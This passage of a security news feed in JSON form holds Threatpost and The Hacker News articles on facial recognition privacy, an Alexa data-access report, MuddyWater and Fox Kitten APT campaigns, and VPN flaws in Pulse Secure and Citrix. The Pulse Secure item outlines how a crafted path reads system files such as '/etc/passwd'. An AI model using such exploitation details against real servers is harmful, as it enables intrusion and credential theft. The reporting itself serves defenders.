traveled to Mexico, for a little vacation. And, I am seeing facial recognition more and more in my life. I think the interesting thing about your story, Lindsey, was also you wrote about consent, whether or not all of these facial recognition systems actually ask for consent and get consent, which they don\u2019t. But when I went to Mexico, we flew into Mexico, and then we went through customs in Mexico, and Mexico had immigration kiosks, where they asked for facial recognition and fingerprints, and to scan our passports, which \u2013 I was really creeped out. My son, who\u2019s 14 years old, I think probably is now part of the government database of fingerprints and facial recognition. It was kind of weird. Considering, you know, he\u2019d been off grid, perhaps I think for a while now, he\u2019s part of the system. And then we flew back into the United States. There was these huge immigration lines in the Boston Airport. And one of the things that we were able to do was to cut the line by using what was called a mobile passport app. And I didn\u2019t realize it but when you use the app, and you get to skip this, this huge onerous line that goes to basically more facial recognition kiosks for people coming into the United States. And the app itself was pretty slick. I mean, it\u2019s kind of funny, because I felt really good about using the app, because it allowed me to cut in line. But the app basically did a facial recognition, had me input my passport information, and basically, took my identity in this app. And, I was so eager to cut the line, I gotta admit, I kind of skipped over a lot of the terms of services. And it saved me about 45 minutes. And for the price of handing over my biometric data to the government and to this to this app.\n\n**Lindsey: **That experience brings up a really good point, because, I think that there definitely are benefits to facial recognition. Like, it\u2019s not all about this dire Orwellian society. I think it makes these processes so much more efficient. But I do think there\u2019s also a bunch of kind of privacy concerns that people expressed to me over the past week. And, Tom, like you were saying, consent and notification, but then also in terms of how the data is being secured, how it\u2019s being shared, and who\u2019s gaining access to that data. So I think that there\u2019s kind of a lot that goes into it. I know that we actually did a poll, a Threatpost poll, and half of the respondents, this kind of surprised me, but half of the respondents said that they don\u2019t believe consent is realistically possible when it comes to facial recognition. So I thought that was interesting, too, because if you think about some of the use cases where biometrics and facial recognition exists, if you have like a security camera, or surveillance camera that is using facial recognition, there\u2019s not a lot you can do to opt out of that except for avoiding that area.\n\n**Tom:**Well, I think you mentioned that the White House now has a zone where they use facial recognition. And right there, there\u2019s no way you can say no, you walk into that zone. And you\u2019re basically get put into a big database, and they cross reference it and figure out who you are.\n\n**Lindsey: **Right. So there\u2019s a lot that goes into that. And then when I was talking to a bunch of security people at the Electronic Frontier Foundation, as well, they were mentioning that there really needs to be regulation for all this. And there, there is one law that exists in Illinois, where it basically regulates the collection of biometric data without consent. But they think that there needs to be more. And in particular, regulation that impacts law enforcement, as opposed to just businesses which that law did. So I know, there\u2019s also been a new bill that was introduced in March, it was, what was it called, the Commercial Facial Recognition Privacy Act, that would have like more widespread implications for businesses in terms of how what kind of notification and consent they would need when they use facial recognition. So I think that\u2019s kind of a step in the right direction, but something to be looking out for.\n\n**Tom: **Yeah, facial recognition has been a creepy topic for a long time. But you know, as these GPUs get better, and these computers get better, and the efficiency of the compute behind them get better. It just becomes even creepier. I don\u2019t even think the tin foil hats will help protect you.\n\n**Lindsey: **So Tom, you also had an interesting story this week. I think it was about passwords being \u2013 I think it was 2 million passwords were \u2013 being exposed.\n\n**Tom: **Yeah. So I mean, we hear about these breach stories all the time. And I mean, there\u2019s probably like, since we\u2019ve been talking, there\u2019s probably been like three breaches, or should I say leaky servers and insecure data on the internet. And one of the things that I think is kind of interesting about the story is that the leaky data, it was tied to a China-based app manufacturer, called Wi Fi Finder. And researchers at GDI Foundation, found 2 million hotspots and passwords for those hotspots on the servers of this app, this Android app called WiFi Finder. And essentially, it\u2019s pretty straightforward. The app itself is an Android-based app, you can get it on Google Play. And it\u2019s one of many of apps that do the same thing. And that is essentially crowdsource on Wi-Fi hotspot data, and also pairing that information with passwords. So the idea is if your dataset is big enough, and you\u2019re wandering around with this app on your phone, you can find a hotspot, and you can authenticate to that hotspot, and you don\u2019t have to ask anybody for a Wi-Fi password. Now, the data that was found on the servers was pretty extensive in the sense that it wasn\u2019t just commercial businesses. So you know, you go to Starbucks, you go to your local gym, or you go to, you know, a bookstore or something like that, you know, you have these public Wi Fi hotspots with a password that you may have to ask for, you may have to look for. And what was happening was that people were crowdsourcing private companies that were not, generally publicly accessible. And for some odd reason, and this really wasn\u2019t explained very well in the reporting, of the research, was that there was a massive, massive amount of Wi-Fi hotspots that were owned by home users like consumers. And so you would you basically had a lot of a lot of password information and a lot of hotspots by consumers in their homes. And the concern there is, is that in a commercial setting, or even in a sort of a public business, publicly accessible hotspot, there are protections put in place to prevent people from messing with the router configurations and accessing some of the some of the settings within the router. But as if you have access to a home router, those security measures are not in place. And there was no documented cases of hacking, but the concern was there regarding that type of information being available to anybody that had access to this leaky server.\n\n**Lindsey:**I feel like we keep seeing this issue of insecure databases and these accidental exposures, which, obviously are different from a malicious breach. I\u2019m curious if there\u2019s something that can be done to prevent this for people who own these databases. I mean, Tom, did you talk to anyone, any experts who had any recommendations about how to better secure databases and kind of what the underlying problem is here?\n\n**Tom: **I did talk to a couple experts on this one. And, you know, the advice is always the same.In terms of leaky data on servers, it doesn\u2019t change much. Just make sure you configure your servers correctly, and make sure that they\u2019re not accessible to the public. I mean, there\u2019s a couple strategies that you can apply to that. I think one of the one of the other suggestions was the way in which some of these publicly accessible sites providing and offer Wi-Fi, and that would be more or less not an open Wi-Fi, not an insecure Wi-Fi, but things that use tokens and allow and divvy out Wi-Fi to individuals using a specific time delineated username and a unique password. And that way, it would basically render all of these apps useless, because there would be a unique username and a unique password, that would timeout within a certain period of time, which would really create a much more secure public Wi-Fi experience. And that was really the suggestion. And that was really what the experts were saying that I talked to regarding the blowback on this story.\n\n**Lindsey: **Well, I\u2019m feeling sufficiently like I need more privacy right now. Maybe we should wrap up now, Tom and Tara, thanks for taking the time and really interesting discussion today.\n\n**Tara: **Yeah. Thanks, Lindsay. Thanks, Tom.\n\n**Tom: **Yeah, have a great weekend. Have a great weekend.\n\n**Lindsey: **Catch us next week on the Threatpost podcast.\n\nFor direct download, [click here](<http://traffic.libsyn.com/digitalunderground/NEWS_WRAP_FINAL.mp3>).\n", "modified": "2019-04-26T17:57:36", "published": "2019-04-26T17:57:36", "id": "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "href": "https://threatpost.com/threatpost-news-wrap-podcast-for-apr-26/144144/", "type": "threatpost", "title": "News Wrap: Amazon Echo Privacy, Facebook FTC Fines and Biometrics Regulation", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:21", "bulletinFamily": "info", "description": "Employees at Amazon can access geolocation information for Alexa users, according to reports \u2013 thus uncovering their home addresses and even satellite pictures of their houses generated from a service such as Google Earth.\n\nAlexa is the built-in voice assistant shipped with devices like Amazon Echo, Amazon Dot, Fire TV and some third-party gadgets. Confidential employee sources speaking to Bloomberg said that the global team that manually audits Alexa\u2019s accuracy in understanding voice commands can \u201ceasily find\u201d a customer\u2019s home address, by combining the GPS coordinates that they have access to with public mapping services.\n\nThis division, known as the Alexa Data Services Team, is tasked with listening to random samplings of voice commands \u2013 and then matching up Alexa\u2019s response to them to see if the voice-recognition technology is working the way that it should. In theory this is anonymized, but location information in the form of GPS coordinates is captured in order to provide localized search results. For instance, if a user asks for the weather forecast, or a review for a restaurant, the geolocation data is necessary to carry out the requests.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nFive Amazon employees [confirmed to Bloomberg](<https://www.bloomberg.com/news/articles/2019-04-24/amazon-s-alexa-reviewers-can-access-customers-home-addresses>) that the division has access to the location data, and two members of the Alexa team said that they felt they have been given \u201cunnecessarily broad access\u201d to personal information.\n\nThey also shared a demo, demonstrating that by plugging in longitude and latitude of a device to Bing Maps or Google Maps, it\u2019s possible to bring up an address and even an image of the Alexa-owner\u2019s house.\n\n\u201cOften an individual piece of data might be innocuous, but the connected-ness of the world today means that no data can be viewed in a vacuum,\u201d Tim Erlin, vice president of product management and strategy at Tripwire, told Threatpost. \u201cGPS coordinates aren\u2019t personally identifiable on their own, but when coupled with a freely accessible system that translates them into an image of that location, they certainly are.\u201d\n\nFor its part, Amazon downplayed the issue.\n\n\u201cAccess to internal tools is highly controlled, and is only granted to a limited number of employees who require these tools to train and improve the service by processing an extremely small sample of interactions,\u201d Amazon said in a statement to media. \u201cOur policies strictly prohibit employee access to or use of customer data for any other reason, and we have a zero-tolerance policy for abuse of our systems. We regularly audit employee access to internal tools and limit access whenever and wherever possible.\u201d\n\nIt\u2019s unclear how many employees have access to the information, but the sources said that the Data Services Team numbers in the \u201cthousands of employees and contractors,\u201d located in Boston, India and Romania.\n\nThe employees also said that there is a second internal Amazon Alexa team for \u201cannotators and verifiers,\u201d who are privy to the information that customers input into the Alexa app when setting up a device. That includes home and work addresses, phone numbers, and any entered contact names, numbers and email addresses. This smaller team is responsible for making sure that Alexa correctly identifies contacts when someone asks her to \u201ccall my mom,\u201d for example.\n\nAll of that said, Amazon appears to have restricted some data access in the wake of a previous Bloomberg report revealing the existence of the Alexa Data Services Team, the outlet said.\n\nNot everyone is concerned about the news.\n\n\u201cThis is overblown. There is no reason to doubt that Amazon is sincere in its claim that only a select few employees have access to consumers\u2019 information and use it in order to perform their job,\u201d said Mike Bittner, manager for Digital Security and Operations at The Media Trust, via email.\n\n\u201cFeatures referenced in the article (suggested restaurants, etc.) require geolocation tracking, suggested products and targeted advertising require purchase and browser/cookie tracking, daily reminders require calendar tracking. All of these features are products of the continued trailing, recording and analysis of user behavior and undoubtedly make the smart home a more convenient tool,\u201d wrote Bittner.\n\nThus, the situation once again brings up the thorny issue of balancing consumer benefit with potential privacy abuse. It makes sense for Amazon to audit how well Alexa is performing \u2013 but is a flawless Alexa experience worth the data exposure for consumers?\n\n\u201cAmazon employees listening to private conversations recorded by Alexa speaks to the very fears that many of us have about smart-home devices,\u201d Harold Li, vice president at ExpressVPN, told Threatpost in an interview. \u201cThese revelations will no doubt make consumers think twice before buying, as our research has shown that privacy concerns and brand trust are crucial in the smart home space.\u201d\n\nHe added, \u201cIt\u2019s more than reasonable for consumers to expect that companies like Amazon do not invade the sanctity of private conversations in their own homes, and we should demand that companies respect that.\u201d\n", "modified": "2019-04-25T15:55:18", "published": "2019-04-25T15:55:18", "id": "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "href": "https://threatpost.com/amazon-employees-personal-alexa/144119/", "type": "threatpost", "title": "Amazon Employees Given 'Broad Access' to Personal Alexa Info", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:59", "bulletinFamily": "info", "description": "An array of customized attack tools are helping the MuddyWater advanced persistent threat (APT) group to successfully exfiltrate data from its governmental and telco targets in the Middle East; an analysis of this toolset reveals a moderately sophisticated threat actor at work \u2013 with the potential to get even more dangerous over time.\n\nAn analysis from Kaspersky Lab released Monday shows that post-infection, the gang reaches for multiple, relatively simple and expendable tools to infiltrate victims and exfiltrate data, mostly using Python and PowerShell-based coding. The arsenal includes download/execute tools and remote access trojans (RATs) written in C# and Python; SSH Python scripts; and multiple Python tools for the extraction of credentials, history and more.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nKaspersky Lab also found that the group uses various deception techniques to derail detection efforts, such as Chinese strings, Russian strings and an impersonation of a completely different hacking group known as RXR Saudi Arabia.\n\n## A Battalion of RATs and More\n\nSome of MuddyWater\u2019s tools include proprietary efforts such as Nihay, a C# download-and-execute tool. It downloads a PowerShell one-liner from a hardcoded URL, researchers found. Like the other malicious code offerings from MuddyWater, this is a straightforward and simple malware that has but a single job.\n\nAnother tool that the researchers observed is a C# RAT called LisfonService. It \u201crandomly chooses a URL from a huge array of hardcoded proxy URLs hiding the real C2 server,\u201d according to [the analysis](<https://securelist.com/muddywaters-arsenal/90659/>), and is tasked with registering a victim with the C2 by collecting the user name, domain or workgroup name, machine name, machine internal IP address, OS version, OS build and public IP address. This information is used later to request commands from the C2, such as executing PowerShell code or crashing the system.\n\nAnother RAT called Client.Py is a Python 3.6 RAT is a bit more advanced; it supports basic keylogger functionality, stealing passwords saved in Chrome, killing task manager, remote command-execution and displaying an alert message for the victim in a message box.\n\nWhile most of the tools that MuddyWater uses are custom-developed, there are a handful that are based on more generic and publicly available ones, researchers added.\n\n## Deception\n\nAppropriately given the APT\u2019s name, one of the ways that MuddyWater throws forensics off the trail of attribution is by planting false flags, the analysis shows \u2013 including the incorporation of different languages into the coding.\n\n\u201cMultiple Chinese strings can be found in some PowerShell RAT payloads (such as Ffb8ea0347a3af3dd2ab1b4e5a1be18a) that seem to have been left in on purpose, probably to make attribution harder,\u201d according to Kaspersky Lab.\n\nThis also holds true for a series of Russian words that researchers found in another PowerShell sample.\n\n\u201cAttackers used Russian words as the RC4 key when establishing a connection to the C2 server,\u201d the team noted. It added, \u201cInterestingly, when visiting the C2, it displays a blank webpage whose HTML source code shows a strange HTML tag value that suggests attackers have tried to impersonate a Saudi hacking group called RXR Saudi Arabia.\u201d\n\nIn all, the MuddyWater APT shows the hallmarks of being a moderately sophisticated threat group that has built up a reasonably advanced armory to carry out their efforts. Lately those efforts have included attacks on government and telco targets in Bahrain, Iraq, Jordan, Lebanon, Saudi Arabia and Turkey, as well as a few other countries in nearby regions (Afghanistan, Azerbaijan and Pakistan), researchers said.\n\n\u201cThese tools\u2026seem to allow them flexibility to adapt and customize the toolset for victims,\u201d according to Kaspersky Lab. \u201cThis continuous capability to steadily adjust and enhance attacks, adapting well to the changing [Middle Eastern geopolitical scene](<https://threatpost.com/new-actor-darkhydrus-targets-middle-east-with-open-source-phishing/134871/>), seems to make this actor a solid adversary that keeps growing. We expect it to keep developing or acquiring additional tools and abilities, possibly including zero-days.\u201d\n", "modified": "2019-04-29T20:04:33", "published": "2019-04-29T20:04:33", "id": "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "href": "https://threatpost.com/muddywater-apt-custom-tools/144193/", "type": "threatpost", "title": "MuddyWater APT Hones an Arsenal of Custom Tools", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:16", "bulletinFamily": "info", "description": "Half of respondents in a recent Threatpost poll said that they don\u2019t believe consent realistically exists when it comes to real-life facial recognition.\n\nThe [recent poll](<https://threatpost.com/poll-creeped-out-facial-recognition/144084/>) of 170 readers comes as facial recognition applications [continue to pop up](<https://threatpost.com/facial-recognition-are-we-ready/144066/>) in the real world \u2013 from airports to police forces. While biometrics certainly has advantages \u2013 such as making identification more efficient \u2013 gaining consent from people whose biometrics are being taken remains a mystery to some, with 53 percent of respondents saying they don\u2019t believe that consent exists or is possible in real-life facial recognition applications .\n\nIn the poll, 32 percent more respondents said that consent will be the act of giving people notification that an area is using facial recognition; and only 10 percent said consent is the ability to opt out of facial recognition applications.\n\nThe issue of biometrics consent came to the forefront again in December when the Department of Homeland Security unveiled a facial-recognition pilot program for monitoring public areas surrounding the [White House](<https://threatpost.com/white-house-facial-recognition-pilot-raises-privacy-alarms/139649/>). When asked about consent, the department said that the public cannot opt-out of the pilot, except by avoiding the areas that will be filmed as part of the program.\n\n\u201cA very weak form of protection is if the government or a business [that uses biometrics for] surveillance, they notify people,\u201d Adam Schwartz, senior staff attorney with the Electronic Frontier Foundation\u2019s civil liberties team, told Threatpost. \u201cWe think this is not consent \u2013 real consent is where they don\u2019t aim a camera at you.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/25163405/consent.png>)\n\nBeyond consent, more than half of poll respondents said that they have negative feelings toward facial recognition due to issues related to privacy and security \u2013 while 30 percent more said they have \u201cmixed\u201d feelings, understanding both the benefits and privacy concerns.\n\nWhen asked what concerns them the most about real-world facial applications, 55 percent of those surveyed pointed to privacy and surveillance issues, while 29 percent said the security of biometrics information and how the data is shared.\n\nDespite these concerns, biometrics continues to gain traction, with the EU last week [approving](<https://www.securityresearch-cou.eu/sites/default/files/02.Rinkens.Secure%20safe%20societies_EU%20interoperability_4-3_v1.0.pdf>) a massive biometrics database for both EU and non-EU citizens. The EU\u2019s approval of the database, called the \u201cCommon Identity Repository,\u201d will aim to connect the systems used by border control, migration and law-enforcement agencies.\n\nAs biometrics continue to increase, meanwhile, up to 85 percent of respondents said that they think that facial recognition should be regulated in the future.\n\nSuch laws exist or are being discussed as it relates to consent: An [Illinois law](<http://www.ilga.gov/legislation/ilcs/ilcs3.asp?ActID=3004&ChapterID=57>) for instance regulates collection of biometric information (including for facial recognition) without consent.\n\nHowever, that law only applies to businesses and not law enforcement. Meanwhile, a new bill introduced in the Senate in [March](<https://www.schatz.senate.gov/imo/media/doc/SIL19337.pdf>), the \u201cCommercial Facial Recognition Privacy Act,\u201d would bar businesses that are using facial recognition from harvesting and sharing user data without consent.\n\n\u201cThe time to regulate and restrict the use of facial recognition technology is now, before it becomes embedded in our everyday lives,\u201d said Jason Kelly, digital strategist with EFF, in a [recent post](<https://www.eff.org/deeplinks/2019/04/skip-surveillance-opting-out-face-recognition-airports>). \u201cGovernment agencies and airlines have ignored years of warnings from privacy groups and Senators that using face recognition technology on travelers would massively violate their privacy. Now, the passengers are in revolt as well, and they\u2019re demanding answers.\u201d\n", "modified": "2019-04-26T12:10:15", "published": "2019-04-26T12:10:15", "id": "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "href": "https://threatpost.com/facial-recognition-consent-doesnt-exist-threatpost-poll-finds/144126/", "type": "threatpost", "title": "Facial Recognition 'Consent\u2019 Doesn\u2019t Exist, Threatpost Poll Finds", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2020-02-18T15:48:20", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n\n\n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://1.bp.blogspot.com/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n\n\n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://1.bp.blogspot.com/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "modified": "2020-02-18T15:13:08", "published": "2020-02-18T15:06:00", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-17T11:56:14", "bulletinFamily": "info", "description": "[](<https://thehackernews.com/images/-_SvUUuvh0ss/XpmKGXtsseI/AAAAAAAAAPI/SuMNxubahJUd3z_eE6vcjjgsuPoYjkdawCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-2.jpg>)\n\nThe United States Cybersecurity and Infrastructure Security Agency (CISA) yesterday issued a [fresh advisory](<https://www.us-cert.gov/ncas/alerts/aa20-107a>) alerting organizations to change all their Active Directory credentials as a defense against cyberattacks trying to leverage a known remote code execution (RCE) vulnerability in Pulse Secure VPN servers\u2014even if they have already patched it. \n \nThe warning comes three months after another [CISA alert](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) urging users and administrators to [patch Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>) environments to thwart attacks exploiting the vulnerability. \n \n\"Threat actors who successfully exploited CVE-2019-11510 and stole a victim organization's credentials will still be able to access \u2014 and move laterally through \u2014 that organization's network after the organization has patched this vulnerability if the organization did not change those stolen credentials,\" CISA said. \n\n\n \nCISA has also [released a tool to help](<https://github.com/cisagov/check-your-pulse>) network administrators look for any indicators of compromise associated with the flaw. \n \n\n\n## A Remote Code Execution Flaw\n\n \nTracked as [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), the pre-authentication arbitrary file read vulnerability could allow remote unauthenticated attackers to compromise vulnerable VPN servers and gain access to all active users and their plain-text credentials, and execute arbitrary commands. \n \n\n\n[](<https://thehackernews.com/images/-9lA8I2RLHGU/XpmBkUgmolI/AAAAAAAA2qg/xhY8D8d5TDs7mVoKQo3kFZmB8fmEu1yvwCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability.jpg>)\n\n \nThe flaw stems from the fact that [directory traversal](<https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/>) is hard-coded to be allowed if a path contains \"dana/html5/acc,\" thus allowing an attacker to send specially crafted URLs to read sensitive files, such as \"/etc/passwd\" that contains information about each user on the system. \n \nTo address this issue, Pulse Secure released an [out-of-band patch](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) on April 24, 2019. \n \n[](<https://thehackernews.com/images/-JoiStCZj61c/XpmChlfPXpI/AAAAAAAAAO8/x_r1K3sIkukYxwR0UcxXPcNLaxvuDvrmQCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-1.jpg>) \n \nWhile on August 24, 2019, security intelligence firm Bad Packets was able to discover [14,528 unpatched](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) Pulse Secure servers, a subsequent scan as of last month yielded [2,099 vulnerable endpoints](<https://twitter.com/bad_packets/status/1242289478334427139>), indicating that a vast majority of organizations have patched their VPN gateways. \n \n\n\n## Unpatched VPN Servers Become Lucrative Target\n\n \nThe fact that there are still over thousands of unpatched Pulse Secure VPN servers has made them a lucrative target for bad actors to distribute malware. \n \nA report from ClearSky found Iranian state-sponsored [hackers using CVE-2019-11510](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>), among others, to penetrate and steal information from target IT and telecommunication companies across the world. \n \nAccording to an [NSA advisory](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>) from October 2019, the \"exploit code is freely available online via the Metasploit framework, as well as GitHub. Malicious cyber actors are actively using this exploit code.\" \n\n\n \nIn a similar alert issued last year, the UK's National Cyber Security Centre ([NCSC](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)) warned that advanced threat groups are exploiting the vulnerability to target government, military, academic, business, and healthcare organizations. \n \nMore recently, [Travelex](<https://www.bbc.com/news/business-51017852>), the foreign currency exchange and travel insurance firm, became a victim after cybercriminals planted Sodinokibi (REvil) [ransomware](<https://doublepulsar.com/big-game-ransomware-being-delivered-to-organisations-via-pulse-secure-vpn-bd01b791aad9>) on the company's networks via the Pulse Secure vulnerability. Although the ransomware operators demanded a ransom of $6 million (\u00a34.6 million), a [Wall Street Journal](<https://www.wsj.com/articles/travelex-paid-hackers-multimillion-dollar-ransom-before-hitting-new-obstacles-11586440800>) report last week said it paid $2.3 million in the form of 285 Bitcoin to resolve its problem. \n \nIn the face of ongoing attacks, it's recommended that organizations upgrade their Pulse Secure VPN, reset their credentials, and scan for unauthenticated log requests and exploit attempts. \n \nCISA has also suggested removing any unapproved remote access programs and inspecting scheduled tasks for scripts or executables that may allow an attacker to connect to an environment. \n \nFor more steps to mitigate the flaw, head to [NSA's advisory here](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>).\n", "modified": "2020-04-17T11:20:03", "published": "2020-04-17T11:20:00", "id": "THN:46994B7A671ED65AD9975F25F514C6E3", "href": "https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html", "type": "thn", "title": "CISA Warns Patched Pulse Secure VPNs Could Still Expose Organizations to Hackers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-24T07:27:25", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-C3dSDFvJiqA/XiW3-49gerI/AAAAAAAABUA/ZZoejAM3OJUPzdMEoE_ef-Wyi7-BtaokACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway-hacking.jpg>)\n\nCitrix has finally started rolling out security patches for a critical [vulnerability in ADC and Gateway](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>) software that attackers started exploiting in the wild earlier this month after the company announced the existence of the issue without releasing any permanent fix. \n \nI wish I could say, \"better late than never,\" but since hackers don't waste time or miss any opportunity to exploit vulnerable systems, even a short window of time resulted in the compromise of hundreds of Internet exposed Citrix ADC and Gateway systems. \n \nAs explained earlier on The Hacker News, the vulnerability, tracked as **CVE-2019-19781**, is a path traversal issue that could allow unauthenticated remote attackers to execute arbitrary code on several versions of Citrix ADC and Gateway products, as well as on the two older versions of Citrix SD-WAN WANOP. \n \nRated critical with CVSS v3.1 base score 9.8, the issue was discovered by Mikhail Klyuchnikov, a security researcher at Positive Technologies, who responsibly reported it to Citrix in early December. \n\n\n \nThe vulnerability is actively being exploited in the wild since last week by dozens of hacking groups and individual attackers\u2014thanks to the public release of multiple [proofs-of-concept exploit code](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>). \n \nAccording to cyber security [experts](<https://twitter.com/0xDUDE/status/1218988914272362496?s=08>), as of today, there are over 15,000 publicly accessible vulnerable Citrix ADC and Gateway servers that attackers can exploit overnight to target potential enterprise networks. \n \nFireEye experts found an attack campaign where someone was compromising vulnerable Citrix ADCs to install a previously-unseen payload, dubbed \"[NotRobin](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>),\" that scans systems for cryptominers and malware deployed by other potential attackers and removes them to maintain exclusive backdoor access. \n \n\n\n> [#Citrix](<https://twitter.com/hashtag/Citrix?src=hash&ref_src=twsrc%5Etfw>) released a free tool that analyzes available log sources and system forensic artifacts to identify whether an ADC appliance has potentially been compromised using CVE-2019-19781 security flaw. \n \nYou can find the tool and instructions here: 